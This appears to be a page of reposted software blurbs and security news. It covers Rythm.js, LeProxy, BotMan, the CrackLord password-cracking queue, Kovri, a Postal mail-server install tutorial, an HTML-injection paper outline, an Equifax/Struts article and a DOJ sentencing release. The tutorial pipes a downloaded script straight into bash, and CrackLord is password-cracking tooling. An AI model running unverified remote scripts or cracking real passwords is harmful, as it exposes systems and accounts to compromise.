Fi8sVrs

<♫/> Rythm.js - v2.1.1 - A javascript library that makes your page dance. Demo at: https://okazari.github.io/Rythm.js/ Getting started Install with npm npm install rythm.js CDN: https://unpkg.com/rythm.js/ https://cdnjs.cloudflare.com/ajax/libs/rythm.js/2.x.x/rythm.min.js Good old way Import rythm into your page <script type="text/javascript" src="/path/to/rythm.min.js"></script> Add one of the rythm css classes to indicate which element will dance. <div class="rythm-bass"></div> Create a Rythm object and give it your audio url then use the start function. var rythm = new Rythm(); rythm.setMusic("path/to/sample.mp3"); rythm.start(); ES6 module import Rythm from 'rythm.js' const rythm = new Rythm(); rythm.setMusic("path/to/sample.mp3"); rythm.start(); API Documentation Rythm object var rythm = new Rythm(); /* The starting scale is the minimum scale your elements will take (Scale ratio is startingScale + (pulseRatio * currentPulse)); * Value in percentage between 0-1 * Default 0.75 */ rythm.startingScale = value; /* The pulse ratio is be the maximum additionnal scale your element will take (Scale ratio is startingScale + (pulseRatio * currentPulse)) * Value in percentage between 0-1 * Default 0.30 */ rythm.pulseRatio = value; /* The max value history represent the number of passed value that will be stored to evaluate the current pulse. * Int value, minimum 1 * Default 100 */ rythm.maxValueHistory = value; /* Set the music the page will dance to. * @audioUrl : '../example/mysong.mp3' */ rythm.setMusic(audioUrl); /* Used to collaborate with other players library * You can connect Rythm to an audioElement, and then control the audio with your other player */ rythm.connectExternalAudioElement(audioElement) /* Adjust music's gain. * @value : Number */ rythm.setGain(value); /* Add your own rythm-class * @elementClass: Class that you want to link your rythm to. * @danceType : Use any of the build in effect or give your own function; * @startValue: The starting frequence of your rythm. * @nbValue: The number of frequences of your rythm. * 1024 Frequences, your rythm will react to the average of your selected frequences. * Examples : bass 0-10 ; medium 150-40 ; high 500-100 */ rythm.addRythm(elementClass, danceType, startValue, nbValue); /* Plug your computer microphone to rythm.js * This function return a promise resolved when the microphone is up. * Require your website to be run in HTTPS */ rythm.plugMicrophone().then(function(){...}) //Let's dance rythm.start(); //Stop the party rythm.stop(); Build in classes with "pulse" effect rythm-bass rythm-medium rythm-high Custom-classes You can use the addRythm function to make your own classes listen to specifics frequences. Here is how the basics classes are created : addRythm('rythm-bass','pulse',0,10); addRythm('rythm-medium','pulse',150,40); addRythm('rythm-high','pulse',500,100); Available dance types For more control of theses dance types, you can give a configuration object as last argument to addRythm addRythm('rythm-high', 'shake', 500, 100, { direction:'left', min: 20, max: 300}); Here are the build in dances and their options pulse min : Minimum value given to transform: scale(). Default: 0.75 max : Maximum value given to transform: scale(). Default: 1.25 jump min : Minimum value given to transform: translateY(). Default: 0 max : Maximum value given to transform: translateY(). Default: 30 shake min : Minimum value given to transform: translateX(). Default: -15 max : Maximum value given to transform: translateX(). Default: 15 direction : left for a right to left move, right for a left to right move. Default: right twist min : Minimum value given to transform: rotate(). Default: -20 max : Maximum value given to transform: rotate(). Default: 20 direction : left for a right to left move, right for a left to right move. Default: right vanish min : Minimum value (between 0 and 1) given to opacity. Default: 0 max : Maximum value (between 0 and 1) given to opacity. Default: 1 reverse : Boolean to reverse the effect. Default false (Higher the pulse is, the more visible it will be) color from : Array of integer between 0 and 255 corresponding to a RGB color. Default: [0,0,0] to : Array of integer between 0 and 255 corresponding to a RGB color. Default: [255,255,255] To see each visual effect, you can go to the Demo Custom dance type If you want to use your own dance type, you can give a function as the 2nd argument of addRythm /* The custom function signature is : * @elem: The HTML element target you want to apply your effect to * @value: The current pulse ratio (percentage between 0 and 1) * @options: The option object user can give as last argument of addRythm function */ const pulse = (elem, value, options = {}) => { const max = options.max || 1.25 const min = options.min || 0.75 const scale = (max - min) * value elem.style.transform = `scale(${min + scale})` } addRythm('my-css-class', pulse, 150, 40) Features Your HTML can dance by using any of the available dance types You can use custom functions to build you own dance type (and if it looks awesome ! Feel free to make a PR ) Contribute Any pull request will be apreciated. You can start coding on this project following this steps : Fork the project Clone your repository run npm install run npm start in the main folder to launch a development webserver. Enjoy the rythm. Adding new dance type In v2.0.x adding a new dance type is pretty easy Create a new file in src\dances This file must export your custom dance type function For example, here is the content of jump.js file /* The function signature is : * @elem: The HTML element target you want to apply your effect to * @value: The current pulse ratio (percentage between 0 and 1) * @options: The option object user can give as last argument of addRythm function */ export default (elem, value, options = {}) => { const max = options.max || 30 const min = options.min || 0 const jump = (max - min) * value elem.style.transform = `translateY(${-jump}px)` } Import it and register it into the constructor of Dancer.js file import jump from './dances/jump.js' class Dancer { constructor() { this.registerDance('jump', jump) } } Commit it and create a PR. Then look at everyone enjoying your contribution ! Licence : GNU GPL Author: @OkazariBzh Download: Rythm.js-master.zip or git clone https://github.com/Okazari/Rythm.js.git Source: https://github.com/Okazari/Rythm.js

LeProxy LeProxy is the HTTP/SOCKS proxy server for everybody! LeProxy is designed for anonymous surfing, improved security and privacy plus circumventing geoblocking. It allows you to enjoy the web like it's meant to work and access your favorite online video platform without annoying country blocks while traveling. LeProxy is a powerful, lightweight, fast and simple to use proxy server that you can host on your own server or PC at home and then access from anywhere. It supports optional authentication so you can share a server instance with your family and friends without having to worry about third parties. It provides compatibility with a large number of clients and services by accepting both common HTTP and SOCKS proxy protocols on a single listening port. Table of contents: Install Usage Clients Development License Note that this is a early beta version and that LeProxy is under active development. Many new features are going to be added in the future! Download: leproxy-master.zip or git clone https://github.com/leproxy/leproxy.git Source: https://github.com/leproxy/leproxy

About BotMan BotMan is a framework agnostic PHP library that is designed to simplify the task of developing innovative bots for multiple messaging platforms, including Slack, Telegram, Microsoft Bot Framework, Nexmo, HipChat, Facebook Messenger and WeChat. $botman->hears('I want cross-platform bots with PHP!', function (BotMan $bot) { $bot->reply('Look no further!'); }); Documentation You can find the BotMan documentation at http://botman.io Support the development Do you like this project? Support it by donating PayPal: Donate Patreon: Donate Contribuiting Please see CONTRIBUTING for details. Security Vulnerabilities If you discover a security vulnerability within BotMan, please send an e-mail to Marcel Pociot at m.pociot@gmail.com. All security vulnerabilities will be promptly addressed. License BotMan is free software distributed under the terms of the MIT license. Download botman-master.zip Sources: https://botman.io https://github.com/botman/botman

What Is It? CrackLord is a system designed to provide a scalable, pluggable, and distributed system for both password cracking as well as any other jobs needing lots of computing resources. Better said, CrackLord is a way to load balance the resources, such as CPU, GPU, Network, etc. from multiple hardware systems into a single queueing service across two primary services: the Resource and Queue. It won't make these tasks faster, but it will make it easier to manage them. System Components There are three primary components to CrackLord as shown in the above image: Queue - The Queue is a service that runs on a single system, providing an interface for users to submit, pause, resume, and delete jobs. These jobs are then processed and sent to available Resources to perform the actual work and handle the results. Resource / Resource Managers - Resources are the individual servers that are connected into the queue. They are managed by a resource manager plugins. These are code that allow various types of resources to be connected. Managers can directly connect to physical resources you own, or use cloud services to spawn resources as necessary. Tools - Tools are a set of plugins, configured on resources, that perform the underlying tasks such as running oclHashcat to crack passwords. Tools are written in the Go programming language and have a standard interface to make them easy to write or enhance. They are wrappers of the various tools used that require great deals of resources, such as John, HashCat, etc. Server Installation We have a set of packages built for every release we make, if you'd like to just use that you can do it by simply following the instructions here. If you'd like to get things build from source, it will first require you to have a working Go build environment with the GOPATH setup. Additionally, you'll probably want Git and Mercurial setup to gather the various libraries and plugins that we've used in the code. First, you'll need to get cracklord itself. go get github.com/jmmcatee/cracklord Next we need to get all of the dependencies downloaded for both the resource daemon and queue daemon. go get github.com/jmmcatee/cracklord/cmd/queued go get github.com/jmmcatee/cracklord/cmd/resourced Now we can actually build the queue daemon and resource daemon go build github.com/jmmcatee/cracklord/cmd/queued go build github.com/jmmcatee/cracklord/cmd/resourced Finally, we can run both the resource and queue daemons, which will both be in the cmd/queued and cmd/resourced directories. You will also need to setup the various configuration files, information for those can be found in our wiki. Contribuiting Addons Probably the easiest way to get involved is to write a new tool plugin. If you have tools that you use as part of testing, research, or work and would like to get them integrated, you can very easily write a new tool and send us a pull request. We'll make sure to get it integrated in as soon as possible. In the plugins directory we have created an empty tool to provide some guidance and help. If you also have a neat way to interact with resources, you would also write a resource manager plugin, maybe for a cloud service that we don't support yet or some new way to do the work. Because of the way the Go language works, we have to compile all of the tools in, so if you do something you'd like to share please send us a pull request and we'll test it and get it out for everyone to use. Scripts / GUI We have a standard API that the queue daemon publishes out for access. We went ahead and wrote a standard web GUI which also uses the same API. That doesn't mean you couldn't make a better one! We're also looking at writing a few scripts to automate common jobs in our workflow, if you end up making them send us links or a pull request and we'll make sure to find a home / give you a shout out! Documentation We're working hard to try and keep the documentation up to date with everything we're doing, but there's always room for a how-to, tutorial, or example and we'd love any help you can provide on those. Head on over to our wiki and see what needs fixing or adding! Bugs / Issues Of course, there's nothing saying you can't work on the CrackLord queue and resource daemons themselves. We have our issues list and any help getting those fixed would be greatly appreciated. Download cracklord-master.zip Source: http://jmmcatee.github.io/cracklord/

To cover, veil, wrap A free, decentralized, anonymity technology based on I2P's open specifications Disclaimer Currently pre-alpha software; under heavy development (and not yet integrated with monero) Downloads Releases Alpha release coming soon Nightly Releases (bleeding edge) Operating System Processor Status Download Checksum Ubuntu 16.04 i686 kovri-latest-linux-i686.tar.bz2 kovri-latest-linux-i686.tar.bz2.sha256sum.txt Ubuntu 16.04 amd64 kovri-latest-linux-amd64.tar.bz2 kovri-latest-linux-amd64.tar.bz2.sha256sum.txt Ubuntu 16.04 armv7 kovri-latest-linux-armv7.tar.bz2 kovri-latest-linux-armv7.tar.bz2.sha256sum.txt Debian Stable armv8 kovri-latest-linux-armv8.tar.bz2 kovri-latest-linux-armv8.tar.bz2.sha256sum.txt OSX 10.10/11/12 amd64 kovri-latest-osx-10.10.tar.bz2 kovri-latest-osx-10.10.tar.bz2.sha256sum.txt FreeBSD 11 amd64 kovri-latest-freebsd-amd64.tar.bz2 kovri-latest-freebsd-amd64.tar.bz2.sha256sum.txt OpenBSD 6 amd64 kovri-latest-openbsd-amd64.tar.bz2 kovri-latest-openbsd-amd64.tar.bz2.sha256sum.txt DragonFly BSD 4.6 amd64 kovri-latest-dragonfly-4.6.tar.bz2 kovri-latest-dragonfly-4.6.tar.bz2.sha256sum.txt Windows i686 kovri-latest-win32.exe kovri-latest-win32.exe.sha256sum.txt Windows amd64 kovri-latest-win64.exe kovri-latest-win64.exe.sha256sum.txt Coverage Type Status Coverity Coveralls License Documentation Build instructions, User Guide, and more can be found in your language within the kovri-docs repository Moneropedia is recommended for all users and developers Developers Various guides (contributing, style, etc.) can be found in your language within the kovri-docs repository (please review before submitting a pull request) Forum Funding System to get funded for your work, submit a proposal build.getmonero.org or monero-build.i2p for detailed build information repo.getmonero.org or monero-repo.i2p are alternatives to GitHub for non-push repository access Vulneravility Response We will pay hackers in Monero (XMR) to exploit Kovri responsibly! See our VRP (Vulnerability Response Process) in kovri-docs for responsible disclosure Repositories Kovri Kovri Docs Kovri Website Monero/Kovri meta Support IRC: Freenode | OFTC | Irc2P with Kovri #kovri | Community & Support Channel #kovri-dev | Development Channel Reddit /r/Kovri Monero StackExchange Contact Email: General Purpose / Media Contact dev [at] getmonero.org All other contact anonimal [at] i2pmail.org PGP Key fingerprint: 1218 6272 CD48 E253 9E2D D29B 66A7 6ECF 9144 09F1 @monerocurrency Download kovri-master.zip Source: https://github.com/monero-project/kovri

Postal is a free and open source complete mail server for sending and receiving emails. It is written in Ruby and JavaScript. You can easily install Postal on your own server. It also helps you in providing correct DNS information required to reducing spam emails. Postal is used by many organizations to send and receive mails on daily basis. In this tutorial, we will install Postal Mail Server on Ubuntu 17.04. Prerequisite Minimal Ubuntu 17.04 server. 8 GB RAM recommended. Root privileges. This guide is written as the root user, if you are logged in as sudo user, run sudo -i. a domain name pointed towards your server. Update Base System Before installing any package it is recommended that you update the packages and repository using the following command. apt update && apt -y upgrade shutdown -r now Once your system is updated, proceed further to install Ruby. Install Ruby Postal is written in Ruby, hence it is required to install Ruby 2.3 or greater on your system. In this tutorial, we will install the latest version of Ruby using RVM. Run the following command to add the GPG key of RVM on your server. gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 Now install RVM using following command. curl -sSL https://get.rvm.io | bash -s stable To use RVM immediately, you will need to run the following command. source /etc/profile.d/rvm.sh Now fetch the list of Ruby using following command. rvm list known You will see following output: # MRI Rubies [ruby-]1.8.6[-p420] [ruby-]1.8.7[-head] # security released on head [ruby-]1.9.1[-p431] [ruby-]1.9.2[-p330] [ruby-]1.9.3[-p551] [ruby-]2.0.0[-p648] [ruby-]2.1[.10] [ruby-]2.2[.6] [ruby-]2.3[.3] [ruby-]2.4[.0] ruby-head Now install the latest version of Ruby in the list using the following command. rvm install 2.4 Use the Ruby version using the following command. rvm use 2.4 You can verify the version of Ruby using following command. ruby -v You should see the following output if Ruby is installed successfully. root@ubuntu:~# ruby -v ruby 2.4.0p0 (2016-12-24 revision 57164) [x86_64-linux] Install Ruby Gems To run Postel on your server, you will need to install bundler and procodile on your server. bundler is a dependency manager for Ruby gem applications. procodile is a process management tool for Ruby applications. Install both the applications using following commands. gem install bundler gem install procodile Install MariaDB Database Server MariaDB is a fork of MySQL database server. MySQL is a relational database management system software used to store data in tabular format. To install MariaDB on your server, run: apt -y install mariadb-client mariadb-server libmysqlclient-dev Run the following commands to start MariaDB and enable it to start at boot time. systemctl start mariadb systemctl enable mariadb Now run the following commands to secure your MariaDB installation. mysql_secure_installation The above command will run a script to secure fresh MariaDB installation. The script will ask for the existing root user password, we have just installed MariaDB, the root password is not set, just press enter to proceed further. The script will ask you if you want to set a root password for your MariaDB installation, choose y and set a strong password for the installation. Most of the questions are self-explanatory and you should answer yes or y to all the questions. Setup Database for Postal To create a database for Postal, we will need to login to MySQL command line first. Run the following command for same. mysql -u root -p The above command will log in to MySQL shell of the root user, it will prompt for the password of the root user. Provide the password to log in. Now run the following query to create a new database for your Postal installation. CREATE DATABASE postal CHARSET utf8mb4 COLLATE utf8mb4_unicode_ci; The above query will create a new database named postal. Make sure that you use semicolon at the end of each query as the query always ends with a semicolon. Now provide the all the privileges to your database user over the database you have created. Run the following command. GRANT ALL ON `postal`.* TO `postal`@`127.0.0.1` IDENTIFIED BY "StrongPassword"; Replace StrongPassword with a very strong and secure password. The database will be automatically written by Postal, but for that, we will need to provide appropriate permissions to Postal users. Run the following command to provide privilege to all the users which start with postal-. GRANT ALL PRIVILEGES ON `postal-%` . * to `postal`@`127.0.0.1` IDENTIFIED BY "StrongPassword"; Now run the following command to immediately apply the changes on the database privileges. FLUSH PRIVILEGES; Exit from MySQL prompt using the following command. EXIT; Install RabbitMQ RabbitMQ is written in Erlang Language, in this tutorial we will install the latest version of Erlang into the server. Install Erlang using following command. apt -y install erlang Import the GPG key by running: curl -sL https://www.rabbitmq.com/rabbitmq-release-signing-key.asc | sudo apt-key add - Now add the RabbitMQ repository by running the following command: add-apt-repository 'deb http://www.rabbitmq.com/debian/ testing main' Update the repository index by running the following command. apt update Now you can install RabbitMQ by running the following command. apt -y install rabbitmq-server RabbitMQ is now installed on your system. Setup RabbitMQ You can start RabbitMQ server process by running the following command. systemctl start rabbitmq-server To automatically start RabbitMQ at boot time, run the following command. systemctl enable rabbitmq-server Now run the following command to create a virtual host for Postal in RabbitMQ server. rabbitmqctl add_vhost /postal Now add a RabbitMQ user for Postal by running the following command. rabbitmqctl add_user postal StrongPassword Replace StrongPassword is very strong password. Now set appropriate permission on RabbitMQ virtual host to RabbitMQ user. rabbitmqctl set_permissions -p /postal postal ".*" ".*" ".*" Install Git and Node.js Git will be used to retrieve the installer package and few dependencies. Run the following command to install Git on your system. apt -y install git You can check if Git is installed successfully by check the version using the following command. git --version You should get following output. root@ubuntu:~# git --version git version 2.11.0 Node.js will be used to compile JavaScript library. Install the software using the following command. apt -y install nodejs You can check if Node.js is installed successfully by running the following command. nodejs -v You should get following output. root@ubuntu:~# nodejs -v v4.7.2 Now that we have all the dependencies ready, you can install the Postal. Install Postal Postal should run as its own isolated user. Run the following command to create a new user. useradd -r -m -d /opt/postal -s /bin/bash postal The above command will create a new user with username postal and the home directory is set to /opt/postal. Allow Ruby to listen to privileged ports by running the following command. setcap 'cap_net_bind_service=+ep' /usr/local/rvm/rubies/ruby-2.4.0/bin/ruby Now that everything is ready, download the latest Postal archive and extract the archive as the Postal user using the following command. wget https://postal.atech.media/packages/stable/latest.tgz -O - | sudo -u postal tar zxpv -C /opt/postal Now create a symbolic link to the Postal binary file by running the following command. ln -s /opt/postal/bin/postal /usr/bin/postal Now you can interact with your Postal server from any directory. For running next commands you will need to login to shell as postal user. su - postal Now you will need to install all the ruby dependencies required to run the application. postal bundle /opt/postal/vendor/bundle Once the dependencies have been installed, you will need to generate the default configuration files. postal initialize-config The above command will generate the required configuration for your Postal installation including various keys and certificates. This will also generate the default postal.yml configuration file. You should get following output. postal@ubuntu:~$ postal initialize-config Created example config file at /opt/postal/config/postal.yml Created new private key for Let's Encrypt Created new signing key for DKIM & HTTP requests Created new private key for default fast server TLS connections Created new self signed certificate for default fast server TLS connections Now you will need to configure few options in postal.yml configuration. nano /opt/postal/config/postal.yml Find the following line: web: # The host that the management interface will be available on host: postal.example.com Change the hostname to your actual domain name. Further, find the following lines. main_db: # Specify the connection details for your MySQL database host: 127.0.0.1 username: postal password: p0stalpassw0rd database: postal message_db: # Specify the connection details for your MySQL server that will be house the # message databases for mail servers. host: 127.0.0.1 username: postal password: p0stalpassw0rd prefix: postal Change the username, password and database name according to the database you have created. Further, find these lines: rabbitmq: # Specify the connection details for your RabbitMQ server. host: 127.0.0.1 username: postal password: StrongPassword vhost: /postal Change the above configuration according to the vhost and user created for RabbitMQ. Next, find the DNS configurations. dns: # Specifies the DNS record that you have configured. Refer to the documentation at # https://github.com/atech/postal/wiki/Domains-&-DNS-Configuration for further # information about these. mx_records: - mx.postal.example.com smtp_server_hostname: postal.example.com spf_include: spf.postal.example.com return_path: rp.postal.example.com route_domain: routes.postal.example.com track_domain: track.postal.example.com Change the domains above with the actual domains you wish to use with the mail server. Save the file and exit from the editor. Now, Initialize the database and other assets by running: postal initialize Create the Postal Administrator user by running the following command. postal make-user The above command will ask you for the email address, username and password. The above command will generate the following output. postal@ubuntu:~$ postal make-user Postal User Creator Enter the information required to create a new Postal user. This tool is usually only used to create your initial admin user. E-Mail Address : me@liptanbiswas.com First Name : Liptan Last Name : Biswas Initial Password: : ************** User has been created with e-mail address me@liptanbiswas.com The command line setup of Postal is now finished, you can start the server using the following command. postal start To check if the services are started correctly, run the following command. postal status You should get following output. postal@ubuntu:~$ postal status Procodile Version 1.0.17 Application Root /opt/postal Supervisor PID 5319 Started 2017-07-21 07:26:19 +0000 || web || Quantity 1 || Command bundle exec puma -C config/puma.rb || Respawning 5 every 3600 seconds || Restart mode usr1 || Log path none specified || Address/Port none || => web.1 Running 07:26 pid:5325 respawns:0 port:- tag:- || worker || Quantity 1 || Command bundle exec ruby script/worker.rb || Respawning 5 every 3600 seconds || Restart mode start-term || Log path none specified || Address/Port none || => worker.1 Running 07:26 pid:5327 respawns:0 port:- tag:- || cron || Quantity 1 || Command bundle exec rake postal:cron || Respawning 5 every 3600 seconds || Restart mode term-start || Log path none specified || Address/Port none || => cron.1 Running 07:26 pid:5329 respawns:0 port:- tag:- || smtp || Quantity 1 || Command bundle exec rake postal:smtp_server || Respawning 5 every 3600 seconds || Restart mode usr1 || Log path none specified || Address/Port none || => smtp.1 Running 07:26 pid:5332 respawns:0 port:- tag:- || requeuer || Quantity 1 || Command bundle exec rake postal:requeuer || Respawning 5 every 3600 seconds || Restart mode term-start || Log path none specified || Address/Port none || => requeuer.1 Running 07:26 pid:5334 respawns:0 port:- tag:- To stop Postal, you can always run the following command. Configuring Ngix and Reverse Proxy For security reasons, Postal web interface and API should be behind any production web server such as Apache or Nginx. In this tutorial, we will install and configure Nginx as a reverse proxy. Install Nginx web server by running the following command. apt -y install nginx It is recommended to use SSL to access Nginx. You can either use a self-signed certificate or Let’s Encrypt free SSL certificate or a commercial certificate. In this tutorial, we will use Let’s Encrypt free SSL. Install Let’s Encrypt client also known as certbot by running the following command. apt -y install certbot Once the installation finishes, run the following command to obtain certificates from Let’s Encrypt certificate authority. Make sure that the domain name is pointed towards your server as certbot will check the domain authority before providing the certificates. Replace mail.example.com with your actual domain name. certbot certonly --standalone -d mail.example.com Once certificates are generated, they will be stored in the /etc/letsencrypt/live/mail.example.com. Let’s Encrypt SSL expires in 90 days, so it is recommended to set an automatic renewal for your certificates. Run the following command to open your crontab file. crontab -e Enter the following line into the crontab file. 30 1 * * 1 /usr/bin/certbot renew >> /var/log/le-renew.log The above cron job will automatically run every Monday at 1:30 AM and if your certificates are due for expiry, it will automatically renew them. Now create a new server block for your website by running the following command. nano /etc/nginx/conf.d/mail.example.com.conf Populate the file with the following content. server { listen [::]:80; listen 0.0.0.0:80; server_name mail.example.com; return 301 https://$host$request_uri; } server { listen [::]:443 ssl; listen 0.0.0.0:443 ssl; root /opt/postal/public; server_name mail.example.com; ssl_certificate /etc/letsencrypt/live/mail.example.com/fullchain.pem; ssl_certificate_key /etc/letsencrypt/live/mail.example.com/privkey.pem; ssl_protocols TLSv1.2 TLSv1.1 TLSv1; ssl_prefer_server_ciphers on; ssl_ciphers EECDH+ECDSA+AESGCM:EECDH+aRSA+AESGCM:EECDH+ECDSA+SHA512:EECDH+ECDSA+SHA384:EECDH+ECDSA+SHA256:ECDH+AESGCM:ECDH+AES256:DH+AESGCM:DH+AES256:RSA+AESGCM:!aNULL:!eNULL:!LOW:!RC4:!3DES:!MD5:!EXP:!PSK:!SRP:!DSS; location / { client_max_body_size 50M; try_files $uri $uri/index.html $uri.html @puma; } location /assets { add_header Cache-Control max-age=3600; } location @puma { proxy_set_header X-Real-IP $remote_addr; proxy_set_header Host $host; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header X-Forwarded-Proto https; proxy_pass http://127.0.0.1:5000; } } Save the file and exit from the editor. Now restart nginx web server by running. systemctl restart nginx To enable nginx to automatically start at boot time, run the following command. systemctl enable nginx You can now access Postal on by browsing the following web site through your favorite web browser. https://mail.example.com Configuring Postal Once you browse the above site, you will see the following interface. Enter the email address and password of the user which you have created earlier. Once you are logged in, you will be asked to create a new organization. Provide the name of the organization. You can choose to use the auto generated short name, or you could specify one yourself. The short names are used as username while authenticating with SMTP server. It should only contain letters, numbers, and hyphen. Once the organization is created, you will be asked to create a new mail server. Provide the name, short name, and mode of the email server. In Live mode, all emails are routed and delivered normally but in development mode, they are only visible in the web interface. Once you have added the mail server, you will need to add a new domain in the mail server. Click on Domains tab and create a new domain name. Once you have added the domain name, you will need to configure the DNS for the domain. You will need to add two TXT records for SPF and DKIM. You will also need to add a CNAME record and MX record for return path and mail delivery. Once you configure the DNS, click Check my records are correct button to verify the DNS configuration. Now you will need to create an SMTP credentials for sending and receiving emails. Choose the type as SMTP or API. Provide the name for SMTP credentials, choose how you wish to handle the email address. Once done, you can come back to Overview tab and you will see the information needed to send or receive the email address. Conclusion In this tutorial, we have successfully setup a full featured mail server using Postal on Ubuntu 17.04. You can use the mail server to send and receive the emails of your organization. Source

Demonstration by Shritam Bhowmick Web Application Penetration Tester Independent Consulting Security Evangelist Dated: 22nd August, 2014, Springs, 9:22 PM IST Web Application Exploitation with Shritam Bhowmick Contents: Hack...............................................................................................................................................................3 HTML Injection as Code Injection....................................................................................................................5 Deploying a sample Vulnerable ASP code for HTML Injection...........................................................................6 Injecting HTML Code into ASP based Application – HTML Injection................................................................18 Mitigating HTML Injection Vulnerable ASP code..............................................................................................22 Mitigating Vulnerable ASP Code via Input Sanitization....................................................................................23 Mitigating Vulnerable ASP Code via Output Encoding.....................................................................................27 Input Sanitization and Output Encoding Combined.........................................................................................30 Deploying a sample Vulnerable PHP code for HTML Injection..........................................................................31 Injecting HTML code into PHP based Application – HTML Injection.................................................................34 Mitigating HTML Injection Vulnerable PHP Code.............................................................................................36 Mitigating Vulnerable PHP Code via Input Sanitization....................................................................................37 Mitigating Vulnerable PHP Code via Output Sanitization.................................................................................39 Input Sanitization and Output Sanitization Combined.....................................................................................41 Deploying a Sample Vulnerable Python Code for HTML Injection.....................................................................42 Injecting HTML Code into Python based Application – HTML Injection............................................................48 Mitigating HTML Injection Vulnerable Python Code.........................................................................................51 Mitigating Vulnerable Python Code via Escaping.............................................................................................57 Mitigating Python Vulnerable Code via Websafe on Web Library......................................................................62 HTML Injection Scenario 1 – HTMLi on Attribute Context in Tags....................................................................66 HTML Injection Scenario 2 – HTMLi on Output Data Length Restriction..........................................................71 Contact Information.......................................................................................................................................81 Download: https://dl.packetstormsecurity.net/papers/general/codehtml-injection.pdf Source: https://packetstormsecurity.com/files/143995/Code-Injection-HTML-Injection.html

A sample of code used by lgtm to detect the vulnerability (lgtm) Correction: An earlier version of this article said the vulnerability exploited by the hackers who broke into Equifax was the one disclosed on Sep. 4. It’s possible that the vulnerability that was targeted was one disclosed in March. We will update this post when we’ve confirmed which vulnerability it was. The credit reporting agency Equifax announced on Sept. 7 that hackers stole records containing personal information on up to 143 million American consumers. The hackers behind the attack, the company said, “exploited a U.S. website application vulnerability to gain access to certain files.” That vulnerability, according to a report on the data breach by William Baird & Co., was in a popular open-source software package called Apache Struts, which is a programming framework for building web applications in Java. Two vulnerabilities in Struts have been discovered so far in 2017. One was announced in March, and another was announced earlier this week on Sept. 4. At the moment, it’s unclear which vulnerability the Baird report was referring to. As we reported earlier this week, the vulnerability announced on Sept. 4 has existed in Struts since 2008. In their report on lgtm.com, the security researchers who discovered the bug warned that the affected application is widely used across industries and can easily be hacked with nothing but a browser, an internet connection, and some information about how the bug works. “At least 65% of the Fortune 100 companies are actively using web applications built with the Struts framework,” the report said. “Organizations like Lockheed Martin, the IRS, Citigroup, Vodafone, Virgin Atlantic, Reader’s Digest, Office Depot, and SHOWTIME are known to have developed applications using the framework. This illustrates how widespread the risk is.” The bug specifically affects a popular plugin called REST, which developers use to handle web requests, like data sent to a server from a form a user has filled out. The vulnerability relates to how Struts parses that kind of data and converts it into information that can be interpreted by the Java programming language. When the vulnerability is successfully exploited, malicious code can be hidden inside of such data, and executed when Struts attempts to convert it. That means intruders could easily inject malware into web servers, possibly without being detected, and use it to steal or delete sensitive data, or infect computers with ransomware, among other things. “Organizations who use Struts should upgrade their components immediately,” said Man Yue Mo, a researcher at lgtm.com. The researchers said in their report that they had developed a “simple working exploit for this vulnerability,” which they have not yet published so that affected users can have a chance to update their software to the latest version, which has fixed the bug. The researchers also said they had found no evidence of an exploit being circulated online, on black market websites, or elsewhere. “At the time of the announcement there is no suggestion that an exploit is publicly available, but it is likely that there will be one soon,” the researchers said in their report. Equifax said in its Sept. 7 statement that most of the consumer information accessed includes “names, Social Security numbers, birth dates, addresses, and in some instances, driver’s license numbers” as well as “credit card numbers for approximately 209,000 consumers.” The company added that 182,000 credit-dispute documents, which contain personal information, were also stolen. Via https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/

ALEXANDRIA, Va. – A North Carolina man who conspired with others to gain unauthorized access to government computer systems and online accounts belonging to several United States government officials was sentenced today to 5 years in prison. Justin G. Liverman, aka “D3F4ULT”, 25, of Morehead City, pleaded guilty on January 6. Liverman admitted to being a member of a conspiracy that called itself “Crackas With Attitude” to commit unauthorized computer intrusions, identity theft, and telephone harassment. According to the statement of facts filed with the plea agreement, beginning in November 2015, Liverman conspired to attempt to intimidate and harass U.S. officials and their families by gaining unauthorized access to victims’ online accounts, among other things. For example, Liverman publicly posted online documents and personal information unlawfully obtained from a victim’s personal account; sent threatening text messages to the same victim’s cellphone; and paid an unlawful “phonebombing” service to call the victim repeatedly with a threatening message. In November 2015, the conspiracy used that victim's government credentials to gain unlawful access to a confidential federal law enforcement database, where Liverman obtained information relating to dozens of law enforcement officers and uploaded this information to a public website. In total, the conspiracy targeted more than 10 victims and caused more than $1.5 million in losses to victims. A co-conspirator, Andrew Otto Boggs, 23, of North Wilkesboro, was sentenced on June 30 to two years in prison. Other members of the conspiracy are located in the United Kingdom and are being prosecuted by the Crown Prosecution Service. Dana J. Boente, U.S. Attorney for the Eastern District of Virginia, Andrew W. Vale, Assistant Director in Charge of the FBI’s Washington Field Office, and Brian J. Ebert, Special Agent in Charge of the U.S. Secret Service’s Washington Field Office, made the announcement after sentencing by U.S. District Judge Gerald Bruce Lee. Assistant U.S. Attorneys Maya D. Song and Jay V. Prabhu, and Special Assistant U.S. Attorney Joseph V. Longobardo prosecuted the case. The U.S. Attorney’s Offices for the Eastern and Western Districts of North Carolina, and the FBI’s Charlotte Division provided significant assistance with the investigation. A copy of this press release is located on the website of the U.S. Attorney’s Office for the Eastern District of Virginia. Related court documents and information is located on the website of the District Court for the Eastern District of Virginia or on PACER by searching for Case No. 1:16-cr-313. Source: https://www.justice.gov/usao-edva/pr/man-sentenced-5-years-hacking-conspiracy-targeted-senior-us-government-officials

